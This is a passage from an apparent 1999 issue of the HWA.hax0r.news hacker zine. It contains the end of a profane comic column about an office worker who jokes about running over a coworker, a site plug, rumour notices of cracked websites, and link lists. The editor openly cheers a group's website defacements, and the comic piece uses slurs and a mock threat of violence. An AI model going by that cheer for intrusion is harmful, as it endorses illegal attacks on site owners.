'Cause he shit-scared of me. He knows I gots the Kung Fu grip. And I gots so much dead presidents in my pocket from workin' all that overtime last Christmas season, when this fiscal year is through I'm gonna take me a long vacation and chill out with some of my bitches in Branson, MO. I'm so good, I even got this one motherfuckin' delinquent account that's been in our files for months to pay the fuck up. That's right. See, one day, I was readin' the newspaper, and I saw this legal notice sayin' that the fucka who owed us all this cash was goin' bankrupt, and that any creditors who were owed money by him had best make theyselves known wit' a quickness. So I tell that Luckenbill about it, he calls our lawyer, and, before you know it, Midstate Office Supply gets this check for $4,130 in the mail. That bitch got wrote off. Uh huh. So when I says I superbad, I ain't just blowin' shit out my ass. H-Dog gots tha flava. Luckenbill said he gonna recommend I get a raise for my swift resolvin' of that delinquent account, but I told him, "Don't do me no damn favors, L, 'cause I gots me a score to settle." It's payback time for that Weinstein asshole. He ain't even been with the company a year, and he think he can hustle in on my award. Guess again, punk. I'm gonna jump in my fly hoopty and run this cocksucka down like a fuckin' dog. Weinstein's eyes gonna be buggin' when he sees my 1981 Buick Regal, a.k.a. Tha Nite Ridahh, comin' up on his sorry ass in the employee parking lot. Pow! I'm gonna take him out like I'm muthafuckin' Scarface, man. Daddy H over and OUT. But before I go, I wanna send some shout-outs to my homies around the office, and all the other righteous folks who be down with the H-Dog: my posse in Accountz Reeceevable, Gary, Linda, and Gladys; Ruth B. 
down in Inventory; tha Extra-Strength Disciples in Accounting; Janitor X; the whole gang over at Snap-Rite Corporation, makers of funky-dope spreadsheets and fly file folders; them cafeteria bitches Theresa and Donna; and Principles Of Accounting, Volume 4. Peace.

@HWA

SITE.1 www.interscape.403-security.org
       ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

This is a new website off the 403 server that is hosting the Interscape group and their efforts to bring you a site with helpful software and original textfiles. Nice pleasing and easy to use layout, well worth a look see, drop by and check it out.

@HWA

H.W Hacked websites
    ~~~~~~~~~~~~~~~~

Note: The hacked site reports stay, especially with some cool hits by groups like *H.A.R.P, go get em boyz racism is a mugs game! - Ed

* Hackers Against Racist Propaganda (See issue #7)

Haven't heard from Catharsys in a while for those following their saga visit http://frey.rapidnet.com/~ptah/ for 'the story so far'...

Looks like things are quieter than normal perhaps with all the FBI action that's going down and groups getting raided some people are becoming a little antsy, well here's the list for this week according to HNN...

From HNN rumours section, http://www.hackernews.com/
contributed by Anonymous

Cracked
Just a reminder that HNN has not been able to verify all of the sites listed below. This is why they are listed in the rumors section. Most of these sites (90%) were allegedly cracked by the Portugal group F0rpaxe in retaliation of recent FBI raids. The following sites have been reported to HNN as Cracked.
June 2nd

From HNN's rumours section;

contributed by Anonymous
Cracked
The following web sites have been reported as Cracked.

June 3rd

contributed by Anonymous
Cracked
The following sites have been reported to HNN as being cracked.
June 4th

contributed by Anonymous
Cracked

-------------------------------------------------------------------------

A.0 APPENDICES
_________________________________________________________________________

A.1 PHACVW, sekurity, security, cyberwar links
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

The links are no longer maintained in this file, there is now a links section on the http://welcome.to/HWA.hax0r.news/ url so check there for current links etc.

The hack FAQ (The #hack/alt.2600 faq)
http://www-personal.engin.umich.edu/~jgotts/underground/hack-faq.html

Hacker's Jargon File (The quote file)
http://www.lysator.liu.se/hackdict/split2/main_index.html

New Hacker's Jargon File.
http://www.tuxedo.org/~esr/jargon/

HWA.hax0r.news Mirror Sites:
~~~~~~~~~~~~~~~~~~~~~~~~~~~
http://www.csoft.net/~hwa/
http://www.digitalgeeks.com/hwa.
http://members.tripod.com/~hwa_2k
http://welcome.to/HWA.hax0r.news/
http://www.attrition.org/~modify/texts/zines/HWA/
http://packetstorm.genocide2600.com/hwahaxornews/
http://archives.projectgamma.com/zines/hwa/.
http://www.403-security.org/Htmls/hwa.hax0r.news.htm

International links:(TBC)
~~~~~~~~~~~~~~~~~~~~~~~~~

Foreign correspondents and others please send in news site links that have security news from foreign countries for inclusion in this list thanks... - Ed

Belgium.......: http://bewoner.dma.be/cum/
Brasil........: http://www.psynet.net/ka0z
                http://www.elementais.cjb.net
Columbia......: http://www.cascabel.8m.com
                http://www.intrusos.cjb.net
Indonesia.....: http://www.k-elektronik.org/index2.html
                http://members.xoom.com/neblonica/
                http://hackerlink.or.id/
Netherlands...: http://security.pine.nl/
Russia........: http://www.tsu.ru/~eugene/
Singapore.....: http://www.icepoint.com
Turkey........: http://www.trscene.org - Turkish Scene is Turkey's first and best security related e-zine.

Got a link for this section? email it to hwa@press.usmc.net and i'll review it and post it here if it merits it.

@HWA

-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=--=-=-=-=-=-=-=-=-
--EoF-HWA-EoF--EoF-HWA-EoF--EoF-HWA-EoF--EoF-HWA-EoF--EoF-HWA-EoF--
© 1998, 1999 (c) Cruciphux/HWA.hax0r.news (R) { w00t }
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=--=-=-=-=-=-=-=-=-
[ 28 63 29 20 31 39 39 39 20 63 72 75 63 69 70 68 75 78 20 68 77 61 ]
[45:6E:64]-[28:63:29:31:39:39:38:20:68:77:61:20:73:74:65:76:65]